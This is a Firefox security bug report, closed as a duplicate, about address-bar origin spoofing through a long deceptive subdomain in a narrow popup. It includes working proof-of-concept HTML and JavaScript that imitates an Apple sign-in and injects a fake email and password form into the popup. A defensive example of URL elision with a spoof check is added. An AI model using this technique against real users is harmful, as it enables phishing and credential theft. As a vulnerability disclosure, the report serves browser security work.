Closed Bug 1951263
Opened 15 days ago, closed 14 days ago
Firefox Address Bar Spoof with Long Subdomain and Popup
Categories: Firefox :: Security, defect
Status: RESOLVED DUPLICATE of bug 1598175
People: Reporter: renwax23, Unassigned
Details: Keywords: reporter-external, Whiteboard: [client-bounty-form]
Attachments (1 file): 1.30 MB, image/png
The issue is simple: when opening a popup with a long subdomain, the address bar prioritizes the beginning and hides the true origin of the URL. For example, with (https://accounts.google.com.attacker.com), when we open it inside a small pop-up the address bar displays (https://accounts.google.com).
The address bar should display (https://...ogle.com.attacker.com) or maybe (https://accounts.google.com....), even though I don't recommend this choice.
POC: https://rx23.io/poc/firefox/2.html (it might not work perfectly for you, as the pop-up width is crucial for the origin spoof; check the screenshot for how it should be)
POC code:
<!-- Framing page: a full-window iframe of the page served from the long-subdomain host -->
<title>Apple</title>
<iframe src="https://idmsa.apple.com.rx23.io/x2.html?x" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;">
</iframe>
<!-- x2.html, served from the long-subdomain host: loaded in the iframe above and opened again as the small popup -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sign in with Apple</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
}
body {
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
background: linear-gradient(to bottom, #f5f5f7, #e5e5e7);
padding: 1rem;
}
.card {
background: white;
border-radius: 20px;
box-shadow: 0 4px 24px rgba(0, 0, 0, 0.1);
width: 100%;
max-width: 400px;
padding: 2.5rem 2rem;
text-align: center;
}
.logo {
width: 40px;
height: 40px;
margin-bottom: 1.5rem;
}
h1 {
font-size: 1.5rem;
color: #1d1d1f;
margin-bottom: 0.5rem;
font-weight: 500;
}
p {
color: #86868b;
margin-bottom: 2rem;
}
.sign-in-button {
background: #000;
color: white;
border: none;
border-radius: 8px;
padding: 0.875rem 1.5rem;
font-size: 1rem;
font-weight: 500;
cursor: pointer;
display: flex;
align-items: center;
justify-content: center;
gap: 0.5rem;
width: 100%;
transition: background-color 0.2s ease;
}
.sign-in-button:hover {
background: #333;
}
.sign-in-button svg {
width: 20px;
height: 20px;
}
</style>
</head>
<body>
<div class="card">
<svg class="logo" viewBox="0 0 24 24" fill="currentColor">
<path d="M18.71 19.5c-.83 1.24-1.71 2.45-3.05 2.47-1.34.03-1.77-.79-3.29-.79-1.53 0-2 .77-3.27.82-1.31.05-2.3-1.32-3.14-2.53C4.25 17 2.94 12.45 4.7 9.39c.87-1.52 2.43-2.48 4.12-2.51 1.28-.02 2.5.87 3.29.87.78 0 2.26-1.07 3.81-.91.65.03 2.47.26 3.64 1.98-.09.06-2.17 1.28-2.15 3.81.03 3.02 2.65 4.03 2.68 4.04-.03.07-.42 1.44-1.38 2.83M13 3.5c.73-.83 1.94-1.46 2.94-1.5.13 1.17-.34 2.35-1.04 3.19-.69.85-1.83 1.51-2.95 1.42-.15-1.15.41-2.35 1.05-3.11"/>
</svg>
<h1>Welcome to Apple</h1>
<p>Continue with your Apple account</p>
<button class="sign-in-button" onclick="openWin()">
<svg viewBox="0 0 24 24" fill="currentColor">
<path d="M18.71 19.5c-.83 1.24-1.71 2.45-3.05 2.47-1.34.03-1.77-.79-3.29-.79-1.53 0-2 .77-3.27.82-1.31.05-2.3-1.32-3.14-2.53C4.25 17 2.94 12.45 4.7 9.39c.87-1.52 2.43-2.48 4.12-2.51 1.28-.02 2.5.87 3.29.87.78 0 2.26-1.07 3.81-.91.65.03 2.47.26 3.64 1.98-.09.06-2.17 1.28-2.15 3.81.03 3.02 2.65 4.03 2.68 4.04-.03.07-.42 1.44-1.38 2.83M13 3.5c.73-.83 1.94-1.46 2.94-1.5.13 1.17-.34 2.35-1.04 3.19-.69.85-1.83 1.51-2.95 1.42-.15-1.15.41-2.35 1.05-3.11"/>
</svg>
Sign in with Apple
</button>
</div>
<script>
var fake=`<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sign In</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
background-color: #f3f3f3;
font-family: Arial, sans-serif;
}
.card {
background: white;
padding: 20px;
border-radius: 12px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
width: 320px;
text-align: center;
}
.input-group {
position: relative;
margin-bottom: 15px;
display: flex;
align-items: center;
border: 1px solid #ccc;
border-radius: 5px;
padding: 5px;
background: white;
}
.input-group input {
width: 100%;
padding: 10px;
border: none;
border-radius: 5px;
font-size: 16px;
outline: none;
}
.input-group .icon {
margin-left: 10px;
color: #aaa;
}
.button {
width: 100%;
padding: 10px;
background: black;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.button:hover {
background: #333;
}
.forgot-password {
margin-top: 10px;
font-size: 14px;
color: #555;
}
</style>
</head>
<body>
<div class="card">
<h1>Sign in</h1>
<div class="input-group">
<span class="icon">📧</span>
<input type="email" id="email" placeholder="Email">
</div>
<div class="input-group">
<span class="icon">🔒</span>
<input type="password" id="password" placeholder="Password">
</div>
<button class="button" onclick="alert('pwned :)')">Sign In</button>
<p class="forgot-password">Forgot your password?</p>
</div>
</body>
</html>`
var win='';
function openWin() {
// Open this same page in a narrow popup; the width decides how the host is elided in the address bar
win=window.open("/x2.html", "", "width=326,height=500");
// Once loaded, replace the popup's body with the fake sign-in form
setTimeout(()=>{win.document.body.innerHTML=fake},500);
}
</script>
</body>
</html>
Thanks
Renwa
Flags: sec-bounty?
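Added example, not code from the bug report, the PoC or Firefox: it contrasts front-preserving elision of a URL (the behaviour the report describes, which leaves only the decoy prefix "https://accounts.google.com" visible) with end-preserving elision, which is what the reporter recommends, and adds a check for whether a displayed string still conveys the real registrable domain. The width budget is counted in characters rather than pixels, the sample URL is constructed to follow the hostname pattern in the report, and the registrable domain is approximated as the last two labels; all three are assumptions of this example.

```javascript
// Added example (not from the bug report or Firefox). Assumptions: widths are
// character counts, and the registrable domain is the last two labels.

// Constructed sample following the hostname pattern in the report.
const SAMPLE_URL = "https://accounts.google.com.attacker.com/x2.html";

// Naive registrable-domain approximation: last two labels (assumption; a real
// implementation must consult the Public Suffix List, e.g. for co.uk).
function registrableDomain(hostname) {
  const labels = hostname.split(".").filter(Boolean);
  return labels.slice(-2).join(".");
}

// Front-preserving elision: keep the start of "scheme://host" and cut the rest.
// With a narrow budget this drops "attacker.com" and shows only the decoy prefix.
function elideKeepingStart(url, maxChars) {
  const u = new URL(url);
  const shown = `${u.protocol}//${u.host}`;
  return shown.length <= maxChars ? shown : shown.slice(0, maxChars);
}

// End-preserving elision: always keep the tail of the host, and never cut into
// the registrable domain even if that means exceeding the budget.
function elideKeepingEnd(url, maxChars) {
  const u = new URL(url);
  const prefix = `${u.protocol}//`;
  const host = u.host;
  if ((prefix + host).length <= maxChars) return prefix + host;
  const ellipsis = "...";
  const budget = maxChars - prefix.length - ellipsis.length;
  const keep = Math.max(budget, registrableDomain(u.hostname).length);
  return prefix + ellipsis + host.slice(host.length - keep);
}

// What a user would read as the site from the displayed string: strip the
// scheme and any leading ellipsis, drop a port, then take the last two labels.
function apparentRegistrableDomain(displayed) {
  const hostPart = displayed
    .replace(/^[a-z][a-z0-9+.-]*:\/\//i, "")
    .replace(/^\.+/, "")
    .replace(/:\d+$/, "");
  return registrableDomain(hostPart);
}

// Spoof check: does the display suggest a different registrable domain than
// the URL actually has?
function isOriginSpoofed(url, displayed) {
  return apparentRegistrableDomain(displayed) !== registrableDomain(new URL(url).hostname);
}

// Demo at the width where the report's spoof appears (27 characters).
const narrowStart = elideKeepingStart(SAMPLE_URL, 27);
const narrowEnd = elideKeepingEnd(SAMPLE_URL, 27);
console.log(narrowStart, "spoofed:", isOriginSpoofed(SAMPLE_URL, narrowStart));
console.log(narrowEnd, "spoofed:", isOriginSpoofed(SAMPLE_URL, narrowEnd));
```

At a 27-character budget the front-preserving variant yields exactly "https://accounts.google.com", which the spoof check flags because the apparent domain (google.com) differs from the real one (attacker.com); the end-preserving variant yields "https://...com.attacker.com" and passes. Refusing to cut into the registrable domain is the design choice that matters: a display that is a few characters too wide is a layout problem, while one that hides the registrable domain is a security problem.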
Updated 14 days ago: Status: UNCONFIRMED → RESOLVED; Closed: 14 days ago; Duplicate of bug: 1598175; Resolution: --- → DUPLICATE
Updated 11 days ago: Flags: sec-bounty? → sec-bounty-
Updated 11 days ago: Group: firefox-core-security